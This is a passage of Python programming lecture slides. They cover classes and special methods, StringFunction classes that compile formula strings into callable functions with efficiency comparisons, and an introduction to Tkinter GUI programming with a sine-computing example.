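        return 'MyBase: i=%s j=%s' % (self.i, self.j)

class Logger:   # hypothetical class, not derived from MyBase
    def write(self):
        return 'Logger: nothing to report'

def write(v):
    # works for any v that has a write method without arguments
    return v.write()

outputs = [write(obj) for obj in (MyBase(6, 9), Logger())]
# outputs is ['MyBase: i=6 j=9', 'Logger: nothing to report']
```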



    Private/non-public data

    There is no technical way of preventing users from manipulating data and methods in an object
    Convention: attributes and methods starting with an underscore are treated as non-public (``protected'')
    Names starting with a double underscore are considered strictly private (Python mangles such names with the class name: an attribute __some defined in class MyClass is actually stored as _MyClass__some)
    class MyClass:
        def __init__(self):
            self._a = False    # non-public
            self.b = 0         # public
            self.__c = 0       # private
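    The name mangling can be inspected through __dict__. A minimal sketch based on the class above; the variable names outside the class are chosen for illustration.

```python
class MyClass:
    def __init__(self):
        self._a = False    # non-public by convention only
        self.b = 0         # public
        self.__c = 0       # stored under the mangled name _MyClass__c

obj = MyClass()
names = sorted(obj.__dict__.keys())
# names is ['_MyClass__c', '_a', 'b']

has_plain_c = hasattr(obj, '__c')   # False: no attribute is named __c
mangled_value = obj._MyClass__c     # 0: still reachable from outside
```

    The double underscore therefore protects against accidental name clashes, not against deliberate access.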
    



    Special attributes

    i1 is MyBase, i2 is MySub

    Dictionary of user-defined attributes:
    >>> i1.__dict__  # dictionary of user-defined attributes
    {'i': 5, 'j': 7}
    >>> i2.__dict__
    {'i': 7, 'k': 9, 'j': 8}
    
    Name of class, name of method:
    >>> i2.__class__.__name__ # name of class
    'MySub'
    >>> i2.write.__name__     # name of method
    'write'
    
    List names of all methods and attributes:
    >>> dir(i2)
    ['__doc__', '__init__', '__module__', 'i', 'j', 'k', 'write']
    



    Testing on the class type

    Use isinstance for testing class type:
    if isinstance(i2, MySub):
        # treat i2 as a MySub instance
    
    Can test if a class is a subclass of another:
    if issubclass(MySub, MyBase):
        ...
    
    Can test if two objects are of the same class:
    if inst1.__class__ is inst2.__class__:
        ...
    
    (is checks object identity, == checks for equal contents)
    a.__class__ refers to the class object of instance a



    Creating attributes on the fly

    Attributes can be added at run time (!)
    >>> class G: pass
    
    >>> g = G()
    >>> dir(g)
    ['__doc__', '__module__']  # no user-defined attributes
    
    >>> # add instance attributes:
    >>> g.xmin=0; g.xmax=4; g.ymin=0; g.ymax=1
    >>> dir(g)
    ['__doc__', '__module__', 'xmax', 'xmin', 'ymax', 'ymin']
    >>> g.xmin, g.xmax, g.ymin, g.ymax
    (0, 4, 0, 1)
    
    >>> # add static variables:
    >>> G.xmin=0; G.xmax=2; G.ymin=-1; G.ymax=1
    >>> g2 = G()
    >>> g2.xmin, g2.xmax, g2.ymin, g2.ymax  # static variables
    (0, 2, -1, 1)
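    One detail worth checking in the session above is what happens for the first instance g, which has both instance attributes and static variables with the same names. A short sketch of the lookup order:

```python
class G:
    pass

g = G()
g.xmin = 0; g.xmax = 4      # instance attributes of g
G.xmin = 0; G.xmax = 2      # static (class) variables
g2 = G()

instance_first = g.xmax     # 4: the instance attribute hides the static one
class_fallback = g2.xmax    # 2: g2 has no instance attribute xmax
```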
    



    Another way of adding new attributes

    Can work with __dict__ directly:
    >>> i2.__dict__['q'] = 'some string'
    >>> i2.q
    'some string'
    >>> dir(i2)
    ['__doc__', '__init__', '__module__', 
     'i', 'j', 'k', 'q', 'write']
    



    Special methods

    Special methods have leading and trailing double underscores (e.g. __str__)
    Here are some operations defined by special methods:
    len(a)            # a.__len__()
    c = a*b           # c = a.__mul__(b)
    a = a+b           # a = a.__add__(b)
    a += c            # a.__iadd__(c)
    d = a[3]          # d = a.__getitem__(3)
    a[3] = 0          # a.__setitem__(3, 0)
    f = a(1.2, True)  # f = a.__call__(1.2, True)
    if a:             # if a.__len__()>0: or if a.__nonzero__():
    



    Example: functions with extra parameters

    Suppose we need a function of x and y with three additional parameters a, b, and c:
    def f(x, y, a, b, c):
        return a + b*x + c*y*y
    
    Suppose we need to send this function to another function
    def gridvalues(func, xcoor, ycoor, file):
        for i in range(len(xcoor)):
            for j in range(len(ycoor)):
                f = func(xcoor[i], ycoor[j])
                file.write('%g %g %g\n' % (xcoor[i], ycoor[j], f))
    
    func is expected to be a function of x and y only (many libraries need to make such assumptions!)
    How can we send our f function to gridvalues?



    Possible (inferior) solutions

    Solution 1: global parameters
    global a, b, c
    ...
    def f(x, y):
        return a + b*x + c*y*y
    
    ...
    a = 0.5;  b = 1;  c = 0.01
    gridvalues(f, xcoor, ycoor, somefile)
    
    Global variables are usually considered evil
    Solution 2: keyword arguments for parameters
    def f(x, y, a=0.5, b=1, c=0.01):
        return a + b*x + c*y*y
    
    ...
    gridvalues(f, xcoor, ycoor, somefile)
    
    useless for other values of a, b, c



    Solution: class with call operator

    Make a class with function behavior instead of a pure function
    The parameters are class attributes
    Class instances can be called as ordinary functions, now with x and y as the only formal arguments
    class F:
        def __init__(self, a=1, b=1, c=1):
            self.a = a;  self.b = b;  self.c = c
    
        def __call__(self, x, y):    # special method!
            return self.a + self.b*x + self.c*y*y
    
    f = F(a=0.5, c=0.01)
    # can now call f as
    v = f(0.1, 2)
    ...
    gridvalues(f, xcoor, ycoor, somefile)
    



    Some special methods

    __init__(self [, args]): constructor
    __del__(self): destructor (seldom needed since Python offers automatic garbage collection)
    __str__(self): string representation for pretty printing of the object (called by print or str)
    __repr__(self): string representation for initialization (a==eval(repr(a)) is true)



    Comparison, length, call

    __eq__(self, x): for equality (a==b), should return True or False
    __cmp__(self, x): for comparison (<, <=, >, >=, ==, !=); return negative integer, zero or positive integer if self is less than, equal or greater than x (resp.)
    __len__(self): length of object (called by len(x))
    __call__(self [, args]): calls like a(x,y) implies a.__call__(x,y)



    Indexing and slicing

    __getitem__(self, i): used for subscripting:
    b = a[i]
    __setitem__(self, i, v): used for subscripting: a[i] = v
    __delitem__(self, i): used for deleting: del a[i]
    These three functions are also used for slices:
    a[p:q:r] implies that i is a slice object with attributes start (p), stop (q) and step (r)
    b = a[:-1]
    # implies
    b = a.__getitem__(i)
    isinstance(i, slice) is True
    i.start is None
    i.stop  is -1
    i.step  is None
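    The slice object can be made visible with a small class. Seq is a hypothetical container written for this sketch; for slices its __getitem__ just reports what it received.

```python
class Seq:
    """Hypothetical container that reports how it was indexed."""
    def __init__(self, data):
        self.data = list(data)

    def __len__(self):
        return len(self.data)

    def __getitem__(self, i):
        if isinstance(i, slice):
            return ('slice', i.start, i.stop, i.step)
        return self.data[i]

a = Seq([10, 20, 30])
single = a[1]         # 20
tail = a[:-1]         # ('slice', None, -1, None)
strided = a[0:3:2]    # ('slice', 0, 3, 2)
```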
    



    Arithmetic operations

    __add__(self, b): used for self+b, i.e., x+y implies x.__add__(y)
    __sub__(self, b): self-b
    __mul__(self, b): self*b
    __div__(self, b): self/b
    __pow__(self, b): self**b or pow(self,b)



    In-place arithmetic operations

    __iadd__(self, b): self += b
    __isub__(self, b): self -= b
    __imul__(self, b): self *= b
    __idiv__(self, b): self /= b



    Right-operand arithmetics

    __radd__(self, b): This method defines b+self, while __add__(self, b) defines self+b. If a+b is encountered and a does not have an __add__ method, b.__radd__(a) is called if it exists (otherwise a+b is not defined).
    Similar methods: __rsub__, __rmul__, __rdiv__
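    A sketch of how __add__ and __radd__ cooperate. The class Meters is hypothetical and exists only for this illustration.

```python
class Meters:
    """Hypothetical length type used only for this illustration."""
    def __init__(self, value):
        self.value = value

    def __add__(self, other):       # self + other
        return Meters(self.value + float(other))

    def __radd__(self, other):      # other + self
        return Meters(float(other) + self.value)

    def __float__(self):
        return float(self.value)

left = Meters(2) + 1          # Meters.__add__ is called
right = 1 + Meters(2)         # an int cannot add a Meters: __radd__ is called
both = Meters(1) + Meters(2)  # float(other) goes through __float__
```

    All three results are Meters instances with value 3.0.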



    Type conversions

    __int__(self): conversion to integer
    (int(a) makes an a.__int__() call)
    __float__(self): conversion to float
    __hex__(self): conversion to hexadecimal number
    Documentation of special methods: see the Python Reference Manual (not the Python Library Reference!), follow link from index ``overloading - operator''



    Boolean evaluations

    if a:
    when is a evaluated as true?
    If a has __len__ or __nonzero__ and the return value is 0 or False, a evaluates to false
    Otherwise: a evaluates to true
    Implication: no implementation of __len__ or __nonzero__ implies that a evaluates to true!!
    while a follows (naturally) the same set-up
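    The rule can be verified with two tiny classes. Both are made up for this sketch, and only __len__ is used.

```python
class Empty:
    def __len__(self):
        return 0

class Plain:      # neither __len__ nor __nonzero__
    pass

truth = [bool(Empty()), bool(Plain())]
# truth is [False, True]
```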



    Example on call operator: StringFunction

    Matlab has a nice feature: mathematical formulas, written as text, can be turned into callable functions
    A similar feature in Python would be like
    f = StringFunction_v1('1+sin(2*x)')
    print f(1.2)  # evaluates f(x) for x=1.2
    
    f(x) implies f.__call__(x)
    Implementation of class StringFunction_v1 is compact! (see next slide)



    Implementation of StringFunction classes

    Simple implementation:
    class StringFunction_v1:
        def __init__(self, expression):
            self._f = expression
    
        def __call__(self, x):
            return eval(self._f)  # evaluate function expression
    
    Problem: eval(string) is slow; should pre-compile expression
    class StringFunction_v2:
        def __init__(self, expression):
            self._f_compiled = compile(expression, 
                                       '<string>', 'eval')
    
        def __call__(self, x):
            return eval(self._f_compiled)
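    A usage sketch for StringFunction_v2. Note the assumption that the formula is evaluated in the namespace of the module where the class is defined, so functions used in the formula (here sin) must be imported there.

```python
from math import sin

class StringFunction_v2:
    def __init__(self, expression):
        self._f_compiled = compile(expression, '<string>', 'eval')

    def __call__(self, x):
        # x is found among the local variables, sin among the globals
        return eval(self._f_compiled)

f = StringFunction_v2('1+sin(2*x)')
value = f(1.2)
```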
    



    New-style classes

    The class concept was redesigned in Python v2.2
    We have new-style (v2.2) and classic classes
    New-style classes add some convenient functionality to classic classes
    New-style classes must be derived from the object base class:
    class MyBase(object):
        # the rest of MyBase is as before
    



    Static data

    Static data (or class variables) are common to all instances
    >>> class Point:
            counter = 0 # static variable, counts no of instances
            def __init__(self, x, y):
                self.x = x;  self.y = y
                Point.counter += 1
    
    >>> for i in range(1000):
            p = Point(i*0.01, i*0.001)
    
    >>> Point.counter     # access without instance
    1000
    >>> p.counter         # access through instance
    1000
    



    Static methods

    New-style classes allow static methods
    (methods that can be called without having an instance)
    class Point(object):
        _counter = 0
        def __init__(self, x, y):
            self.x = x;  self.y = y;  Point._counter += 1
        def ncopies(): return Point._counter
        ncopies = staticmethod(ncopies)
    
    Calls:
    >>> Point.ncopies()
    0
    >>> p = Point(0, 0)
    >>> p.ncopies()
    1
    >>> Point.ncopies()
    1
    
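    Static methods receive neither self nor the class as an argument; class attributes must be accessed explicitly through the class name (as in Point._counter)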
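    From Python 2.4 on, the same static method can also be declared with decorator syntax. The sketch below is an alternative spelling of the Point class above, not a different technique.

```python
class Point(object):
    _counter = 0

    def __init__(self, x, y):
        self.x = x;  self.y = y
        Point._counter += 1

    @staticmethod                   # same effect as staticmethod(ncopies)
    def ncopies():
        return Point._counter       # class attribute via the class name

before = Point.ncopies()            # 0
p = Point(0, 0)
after = (p.ncopies(), Point.ncopies())   # (1, 1)
```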



    Properties

    Python 2.2 introduced ``intelligent'' assignment operators, known as properties
    That is, assignment may imply a function call:
    x.data = mydata;     yourdata = x.data
    # can be made equivalent to
    x.set_data(mydata);  yourdata = x.get_data()
    
    Construction:
    class MyClass(object):   # new-style class required!
        ...
        def set_data(self, d):
            self._data = d
            <update other data structures if necessary...>
    
        def get_data(self):
            <perform actions if necessary...>
            return self._data
    
        data = property(fget=get_data, fset=set_data)
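    A complete, runnable sketch of the construction. The class Interval and its consistency check are assumptions made for this illustration.

```python
class Interval(object):             # hypothetical example class
    def __init__(self, lower, upper):
        self._lower = lower         # non-public data behind the property
        self.upper = upper

    def get_lower(self):
        return self._lower

    def set_lower(self, value):
        if value > self.upper:
            raise ValueError('lower bound exceeds upper bound')
        self._lower = value

    lower = property(fget=get_lower, fset=set_lower)

iv = Interval(0, 4)
iv.lower = 2            # implies iv.set_lower(2)
current = iv.lower      # implies iv.get_lower()
try:
    iv.lower = 10       # rejected by set_lower
    rejected = False
except ValueError:
    rejected = True
```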
    



    Attribute access; traditional

  • Direct access:
    my_object.attr1 = True
    a = my_object.attr1
    

  • get/set functions:
    class A:
        def set_attr1(self, attr1):
            self._attr1 = attr1 # underscore => non-public variable
            self._update(self._attr1)  # update internal data too
        ...
    
    my_object.set_attr1(True)
    
    a = my_object.get_attr1()
    
    Tedious to write! Properties are simpler...



    Attribute access; recommended style

  • Use direct access if user is allowed to read and assign values to the attribute

  • Use properties to restrict access, with a corresponding underlying non-public class attribute

  • Use properties when assignment or reading requires a set of associated operations

  • Never use get/set functions explicitly
    myobj.compute_something()
    myobj.my_special_variable = yourobj.find_values(x,y)
    



    More about scope

    Example: a is global, local, and class attribute
    a = 1                 # global variable
    
    def f(x):
        a = 2             # local variable
    
    class B:
        def __init__(self):
            self.a = 3    # class attribute
    
        def scopes(self):
            a = 4         # local (method) variable
    
    Dictionaries with variable names as keys and variables as values:
    locals()    : local variables
    globals()   : global variables
    vars()      : local variables
    vars(self)  : class attributes
    



    Demonstration of scopes (1)

    Function scope:
    >>> a = 1
    >>> def f(x):
            a = 2             # local variable
            print 'locals:', locals(), 'local a:', a
            print 'global a:', globals()['a']
    
    >>> f(10)
    locals: {'a': 2, 'x': 10} local a: 2
    global a: 1
    
    a refers to local variable



    Demonstration of scopes (2)

    Class:
    class B:
        def __init__(self):
            self.a = 3    # class attribute
    
        def scopes(self):
            a = 4         # local (method) variable
            print 'locals:', locals()
            print 'vars(self):', vars(self)
            print 'self.a:', self.a
            print 'local a:', a, 'global a:', globals()['a']
    
    Interactive test:
    >>> b=B()
    >>> b.scopes()
    locals: {'a': 4, 'self': <scope.B instance at 0x4076fb4c>}
    vars(self): {'a': 3}
    self.a: 3
    local a: 4 global a: 1
    



    Demonstration of scopes (3)

    Variable interpolation with vars:
    class C(B):
        def write(self):
            local_var = -1
            s = '%(local_var)d %(global_var)d %(a)s' % vars()
    
    Problem: vars() returns dict with local variables and the string needs global, local, and class variables
    Primary solution: use printf-like formatting:
    s = '%d %d %d' % (local_var, global_var, self.a)
    
    More exotic solution:
    all = {}
    for scope in (locals(), globals(), vars(self)):
        all.update(scope)
    s = '%(local_var)d %(global_var)d %(a)s' % all
    
    (but now we overwrite a...)



    Namespaces for exec and eval

    exec and eval may take dictionaries for the global and local namespace:
    exec code in globals, locals
    eval(expr, globals, locals)
    
    Example:
    a = 8;  b = 9
    d = {'a':1, 'b':2}
    eval('a + b', d)  # yields 3
    
    and
    from math import *
    d['b'] = pi
    eval('a+sin(b)', globals(), d)  # yields 1.0 (to machine precision)
    
    Creating such dictionaries can be handy



    Generalized StringFunction class (1)

    Recall the StringFunction-classes for turning string formulas into callable objects
    f = StringFunction('1+sin(2*x)')
    print f(1.2)
    
    We would like:

    an arbitrary name of the independent variable
    parameters in the formula
    f = StringFunction_v3('1+A*sin(w*t)', 
                          independent_variable='t',
                          set_parameters='A=0.1; w=3.14159')
    print f(1.2)
    f.set_parameters('A=0.2; w=3.14159')
    print f(1.2)
    



    First implementation

  • Idea: hold independent variable and ``set parameters'' code as strings

  • Exec these strings (to bring the variables into play) right before the formula is evaluated
    class StringFunction_v3:
        def __init__(self, expression, independent_variable='x',
                     set_parameters=''):
            self._f_compiled = compile(expression, 
                                       '<string>', 'eval')
            self._var = independent_variable  # 'x', 't' etc.
            self._code = set_parameters
    
        def set_parameters(self, code):
            self._code = code
    
        def __call__(self, x):
            exec '%s = %g' % (self._var, x)  # assign indep. var.
            if self._code:  exec(self._code) # parameters?
            return eval(self._f_compiled)
    



    Efficiency tests

  • The exec used in the __call__ method is slow!

  • Think of a hardcoded function,
    def f1(x):
        return sin(x) + x**3 + 2*x
    
    and the corresponding StringFunction-like objects

  • Efficiency test (time units to the right):
    f1               :  1
    StringFunction_v1: 13
    StringFunction_v2:  2.3
    StringFunction_v3: 22
    
    Why?

  • eval w/compile is important; exec is very slow



    A more efficient StringFunction (1)

  • Ideas: hold parameters in a dictionary, set the independent variable into this dictionary, run eval with this dictionary as local namespace

  • Usage:
    f = StringFunction_v4('1+A*sin(w*t)', independent_variable='t',
                          A=0.1, w=3.14159)
    f.set_parameters(A=2)   # can be done later
    



    A more efficient StringFunction (2)

  • Code:
    class StringFunction_v4:
        def __init__(self, expression, **kwargs):
            self._f_compiled = compile(expression, 
                                       '<string>', 'eval')
            self._var = kwargs.get('independent_variable', 'x')
            self._prms = kwargs
            try:    del self._prms['independent_variable']
            except: pass
    
        def set_parameters(self, **kwargs):
            self._prms.update(kwargs)
    
        def __call__(self, x):
            self._prms[self._var] = x
            return eval(self._f_compiled, globals(), self._prms)
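    A usage sketch for StringFunction_v4, assuming that sin is imported in the module where the class is defined (the formula is evaluated with globals() of that module as the global namespace). The independent variable t must be announced through the independent_variable keyword.

```python
from math import sin

class StringFunction_v4:
    def __init__(self, expression, **kwargs):
        self._f_compiled = compile(expression, '<string>', 'eval')
        self._var = kwargs.get('independent_variable', 'x')
        self._prms = kwargs
        try:    del self._prms['independent_variable']
        except: pass

    def set_parameters(self, **kwargs):
        self._prms.update(kwargs)

    def __call__(self, x):
        self._prms[self._var] = x
        return eval(self._f_compiled, globals(), self._prms)

f = StringFunction_v4('1+A*sin(w*t)', independent_variable='t',
                      A=0.1, w=3.14159)
first = f(1.2)           # uses A=0.1
f.set_parameters(A=2)    # only A changes, w is kept
second = f(1.2)
```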
    



    Extension to many independent variables

  • We would like arbitrary functions of arbitrary parameters and independent variables:
    f = StringFunction_v5('A*sin(x)*exp(-b*t)', A=0.1, b=1,
                          independent_variables=('x','t'))
    print f(1.5, 0.01)  # x=1.5, t=0.01
    

  • Idea: add functionality in subclass
    class StringFunction_v5(StringFunction_v4):
        def __init__(self, expression, **kwargs):
            StringFunction_v4.__init__(self, expression, **kwargs)
            self._var = tuple(kwargs.get('independent_variables',
                              'x'))
            try:    del self._prms['independent_variables']
            except: pass
            
        def __call__(self, *args):
            for name, value in zip(self._var, args):
                self._prms[name] = value  # add indep. variable
            return eval(self._f_compiled, 
                        globals(), self._prms)
    



    Efficiency tests

  • Test function: sin(x) + x**3 + 2*x
    f1               :  1
    StringFunction_v1: 13      (because of uncompiled eval)
    StringFunction_v2:  2.3
    StringFunction_v3: 22      (because of exec in __call__)
    StringFunction_v4:  2.3
    StringFunction_v5:  3.1    (because of loop in __call__)
    



    Removing all overhead

  • Instead of eval in __call__ we may build a (lambda) function
    class StringFunction:
        def _build_lambda(self):
            s = 'lambda ' + ', '.join(self._var)
            # add parameters as keyword arguments:
            if self._prms:
                s += ', ' + ', '.join(['%s=%s' % (k, self._prms[k]) \
                                       for k in self._prms])
            s += ': ' + self._f
            self.__call__ = eval(s, self._globals)
    

  • For a call
    f = StringFunction('A*sin(x)*exp(-b*t)', A=0.1, b=1,
                       independent_variables=('x','t'))
    
    the s looks like
    lambda x, t, A=0.1, b=1: A*sin(x)*exp(-b*t)
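    The string building can be tried outside the class. In this sketch the names variables, parameters and formula stand in for self._var, self._prms and self._f, and the dictionary given to eval plays the role of self._globals; the keys are sorted only to make the string reproducible. The body of a lambda is a bare expression, so no return keyword appears in s.

```python
from math import sin, exp

variables = ('x', 't')               # stands in for self._var
parameters = {'A': 0.1, 'b': 1}      # stands in for self._prms
formula = 'A*sin(x)*exp(-b*t)'       # stands in for self._f

s = 'lambda ' + ', '.join(variables)
# add parameters as keyword arguments:
if parameters:
    s += ', ' + ', '.join(['%s=%s' % (k, parameters[k])
                           for k in sorted(parameters)])
s += ': ' + formula
# s is 'lambda x, t, A=0.1, b=1: A*sin(x)*exp(-b*t)'

f = eval(s, {'sin': sin, 'exp': exp})   # an ordinary Python function
value = f(1.5, 0.01)
```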
    



    Final efficiency test

  • StringFunction objects are as efficient as similar hardcoded objects, i.e.,
    class F:
        def __call__(self, x, y):
            return sin(x)*cos(y)
    
    but there is some overhead associated with the __call__ op.

  • Trick: extract the underlying method and call it directly
    f1 = F()
    f2 = f1.__call__
    # f2(x,y) is faster than f1(x,y)
    
    Can typically reduce CPU time from 1.3 to 1.0

  • Conclusion: now we can grab formulas from the command line, a GUI, or the Web and turn them into callable functions with no overhead



    Adding pretty print and reconstruction

    ``Pretty print'':
    class StringFunction:
        ...
        def __str__(self):
            return self._f  # just the string formula
    
    Reconstruction: a = eval(repr(a))
        # StringFunction('1+x+a*y',
        #                independent_variables=('x','y'),
        #                a=1)
    
        def __repr__(self):
            kwargs = ', '.join(['%s=%s' % (key, repr(value)) \
                         for key, value in self._prms.items()])
            return "StringFunction(%s, independent_variables=%s" \
                   ", %s)" % (repr(self._f), repr(self._var), kwargs)
    



    Examples on StringFunction functionality (1)

    >>> from py4cs.StringFunction import StringFunction
    >>> f = StringFunction('1+sin(2*x)')
    >>> f(1.2)
    1.6754631805511511
    
    >>> f = StringFunction('1+sin(2*t)', independent_variables='t')
    >>> f(1.2)
    1.6754631805511511
    
    >>> f = StringFunction('1+A*sin(w*t)', independent_variables='t', \
                           A=0.1, w=3.14159)
    >>> f(1.2)
    0.94122173238695939
    >>> f.set_parameters(A=1, w=1)
    >>> f(1.2)
    1.9320390859672263
    
    >>> f(1.2, A=2, w=1)   # can also set parameters in the call
    2.8640781719344526
    



    Examples on StringFunction functionality (2)

    >>> # function of two variables:
    >>> f = StringFunction('1+sin(2*x)*cos(y)', \
                           independent_variables=('x','y'))
    >>> f(1.2,-1.1)
    1.3063874788637866
    
    >>> f = StringFunction('1+V*sin(w*x)*exp(-b*t)', \
                           independent_variables=('x','t'))
    >>> f.set_parameters(V=0.1, w=1, b=0.1)
    >>> f(1.0,0.1)
    1.0833098208613807
    >>> str(f)  # print formula with parameters substituted by values
    '1+0.1*sin(1*x)*exp(-0.1*t)'
    >>> repr(f)
    "StringFunction('1+V*sin(w*x)*exp(-b*t)', 
    independent_variables=('x', 't'), b=0.10000000000000001, 
    w=1, V=0.10000000000000001)"
        
    >>> # vector field of x and y:
    >>> f = StringFunction('[a+b*x,y]', \
                               independent_variables=('x','y'))
    >>> f.set_parameters(a=1, b=2)
    >>> f(2,1)  # [1+2*2, 1]
    [5, 1]
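    The repr(f) output shown above is valid constructor syntax, which is what makes eval(repr(f)) work. The round trip can be sketched with a small stand-in class; Formula is a hypothetical name, and it only stores the formula (it does not evaluate it).

```python
class Formula:
    """Hypothetical stand-in for StringFunction: stores formula and parameters."""
    def __init__(self, formula, independent_variables=('x',), **prms):
        self._f = formula
        self._var = tuple(independent_variables)
        self._prms = prms

    def __str__(self):
        return self._f   # just the string formula

    def __repr__(self):
        # emit text that is a valid call to the constructor
        args = [repr(self._f), 'independent_variables=%r' % (self._var,)]
        args += ['%s=%r' % (k, self._prms[k]) for k in sorted(self._prms)]
        return 'Formula(%s)' % ', '.join(args)

a = Formula('1+x+a*y', independent_variables=('x', 'y'), a=1)
b = eval(repr(a))   # rebuild an equivalent object from the repr string
print(repr(b))
```

    Using repr on each value (rather than str) matters: string-valued parameters then keep their quotes in the generated text.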
    



    Exercise

    Implement a class for vectors in 3D
    Application example:
    >>> from Vec3D import Vec3D
    >>> u = Vec3D(1, 0, 0)  # (1,0,0) vector
    >>> v = Vec3D(0, 1, 0)
    >>> print u**v # cross product
    (0, 0, 1)
    >>> len(u)     # Euclidean norm
    1.0
    >>> u[1]       # subscripting
    0
    >>> v[2]=2.5   # subscripting w/assignment
    >>> u+v        # vector addition
    (1, 1, 2.5)
    >>> u-v        # vector subtraction
    (1, -1, -2.5)
    >>> u*v        # inner (scalar, dot) product
    0
    >>> str(u)     # pretty print
    '(1, 0, 0)'
    >>> repr(u)    # u = eval(repr(u))
    'Vec3D(1, 0, 0)'
    



    Exercise, 2nd part

    Make the arithmetic operators +, - and * more intelligent:
    u = Vec3D(1, 0, 0)
    v = Vec3D(0, -0.2, 8)
    a = 1.2
    u+v  # vector addition
    a+v  # scalar plus vector, yields (1.2, 1, 9.2)
    v+a  # vector plus scalar, yields (1.2, 1, 9.2)
    a-v  # scalar minus vector
    v-a  # vector minus scalar
    a*v  # scalar times vector
    v*a  # vector times scalar
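    As a hint for this part: Python tries the right operand's reflected method (__radd__, __rsub__, __rmul__) when the left operand does not know how to handle the operation. The sketch below shows the mechanism on a hypothetical 2D class, Vec2D, which is not part of the exercise; the 3D version is left to the reader.

```python
class Vec2D:
    """Hypothetical 2D vector, used only to illustrate operator dispatch."""
    def __init__(self, x, y):
        self.x = x; self.y = y

    def __add__(self, other):
        if isinstance(other, Vec2D):          # vector + vector
            return Vec2D(self.x + other.x, self.y + other.y)
        if isinstance(other, (int, float)):   # vector + scalar
            return Vec2D(self.x + other, self.y + other)
        return NotImplemented

    __radd__ = __add__   # scalar + vector: addition commutes

    def __sub__(self, other):
        if isinstance(other, Vec2D):          # vector - vector
            return Vec2D(self.x - other.x, self.y - other.y)
        if isinstance(other, (int, float)):   # vector - scalar
            return Vec2D(self.x - other, self.y - other)
        return NotImplemented

    def __rsub__(self, other):                # scalar - vector: order matters
        if isinstance(other, (int, float)):
            return Vec2D(other - self.x, other - self.y)
        return NotImplemented

    def __repr__(self):
        return 'Vec2D(%r, %r)' % (self.x, self.y)

v = Vec2D(1, 2)
print(repr(1 + v))    # handled by __radd__
print(repr(10 - v))   # handled by __rsub__
```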
    





    Simple GUI programming with Python




    Contents

    Introductory GUI programming
    Scientific Hello World examples
    GUI for simviz1.py
    GUI elements: text, input text, buttons, sliders, frames (for controlling layout)



    GUI toolkits callable from Python

    Python has interfaces to the GUI toolkits

    Tk (Tkinter)
    Qt (PyQt)
    wxWindows (wxPython)
    Gtk (PyGtk)
    Java Foundation Classes (JFC) (javax.swing in Jython)
    Microsoft Foundation Classes (PythonWin)



    Discussion of GUI toolkits

    Tkinter has been the default Python GUI toolkit
    Most Python installations support Tkinter
    PyGtk, PyQt and wxPython are increasingly popular and more sophisticated toolkits
    These toolkits require huge C/C++ libraries (Gtk, Qt, wxWindows) to be installed on the user's machine
    Some prefer to generate GUIs using an interactive designer tool, which automatically generates calls to the GUI toolkit
    Some prefer to program the GUI code (or automate that process)
    It is very wise (and necessary) to learn some GUI programming even if you end up using a designer tool
    We treat Tkinter (with extensions) here since it is so widely available and simpler to use than its competitors
    See doc.html for links to literature on PyGtk, PyQt, wxPython and associated designer tools



    More info

    Ch. 6 in the course book
    ``Introduction to Tkinter'' by Lundh (see doc.html)
    Efficient working style: grab GUI code from examples
    Demo programs:
    $PYTHONSRC/Demo/tkinter
    demos/All.py in the Pmw source tree
    $scripting/src/gui/demoGUI.py
    



    Tkinter, Pmw and Tix

    Tkinter is an interface to the Tk package in C (for Tcl/Tk)
    Megawidgets, built from basic Tkinter widgets, are available in Pmw (Python megawidgets) and Tix
    Pmw is written in Python
    Tix is written in C (and as Tk, aimed at Tcl users)
    GUI programming becomes simpler and more modular by using classes; Python supports this programming style



    Scientific Hello World GUI

    Graphical user interface (GUI) for computing the sine of numbers
    The complete window is made of widgets
    (also referred to as windows)
    Widgets from left to right:

    a label with "Hello, World! The sine of"
    a text entry where the user can write a number
    pressing the button "equals" computes the sine of the number
    a label displays the sine value



    The code (1)

    #!/usr/bin/env python
    from Tkinter import *
    import math
    
    root = Tk()               # root (main) window
    top = Frame(root)         # create frame (good habit)
    top.pack(side='top')      # pack frame in main window
    
    hwtext = Label(top, text='Hello, World! The sine of')
    hwtext.pack(side='left')
    
    r = StringVar()  # special variable to be attached to widgets
    r.set('1.2')     # default value
    r_entry = Entry(top, width=6, relief='sunken', textvariable=r)
    r_entry.pack(side='left')
    



    The code (2)

    s = StringVar()  # variable to be attached to widgets
    def comp_s():
       global s
       s.set('%g' % math.sin(float(r.get())))  # construct string
    
    compute = Button(top, text=' equals ', command=comp_s)
    compute.pack(side='left')
    
    s_label = Label(top, textvariable=s, width=18)
    s_label.pack(side='left')
    
    root.mainloop()
    



    Structure of widget creation

    A widget has a parent widget
    A widget must be packed (placed in the parent widget) before it can appear visually
    Typical structure:
    widget = Tk_class(parent_widget, 
                      arg1=value1, arg2=value2)
    widget.pack(side='left')
    
    Variables can be tied to the contents of, e.g., text entries, but only special Tkinter variables are legal: StringVar, DoubleVar, IntVar



    The event loop

    No widgets are visible before we call the event loop:
    root.mainloop()
    
    This loop waits for user input (e.g. mouse clicks)
    There is no predefined program flow after the event loop is invoked; the program just responds to events
    The widgets define the event responses
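    The idea that the program flow is decided by incoming events can be illustrated without any GUI. The class below is a toy model only: ToyLoop and its methods are hypothetical names, it is not how Tk is implemented, and a real event loop waits for new events instead of returning when the queue is empty.

```python
class ToyLoop:
    """Toy model of an event loop (not the Tk implementation)."""
    def __init__(self):
        self.bindings = {}   # event name -> callback
        self.queue = []      # pending events

    def bind(self, name, callback):
        self.bindings[name] = callback

    def post(self, name):
        self.queue.append(name)

    def mainloop(self):
        # no predefined flow: we only respond to what arrives
        while self.queue:
            name = self.queue.pop(0)
            if name == 'quit':
                break
            callback = self.bindings.get(name)
            if callback is not None:   # unbound events are ignored
                callback(name)

log = []
loop = ToyLoop()
loop.bind('<Return>', log.append)
for event in ('<Return>', '<Button-1>', '<Return>', 'quit', '<Return>'):
    loop.post(event)
loop.mainloop()
print(log)
```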



    Binding events

    Instead of clicking "equals", pressing return in the entry window computes the sine value
    # bind a Return in the r_entry widget to calling comp_s
    # (comp_s must then accept an event argument):
    r_entry.bind('<Return>', comp_s)
    
    One can bind any keyboard or mouse event to user-defined functions
    We have also replaced the "equals" button by a straight label



    Packing widgets

    The pack command determines the placement of the widgets:
    widget.pack(side='left')
    
    This results in stacking widgets from left to right



    Packing from top to bottom

    Packing from top to bottom:
    widget.pack(side='top')
    
    results in

    Values of side: left, right, top, bottom



    Lining up widgets with frames

    Frame: empty widget holding other widgets
    (used to group widgets)
    Make 3 frames, packed from top
    Each frame holds a row of widgets
    Middle frame: 4 widgets packed from left



    Code for middle frame

    # create frame to hold the middle row of widgets:
    rframe = Frame(top)
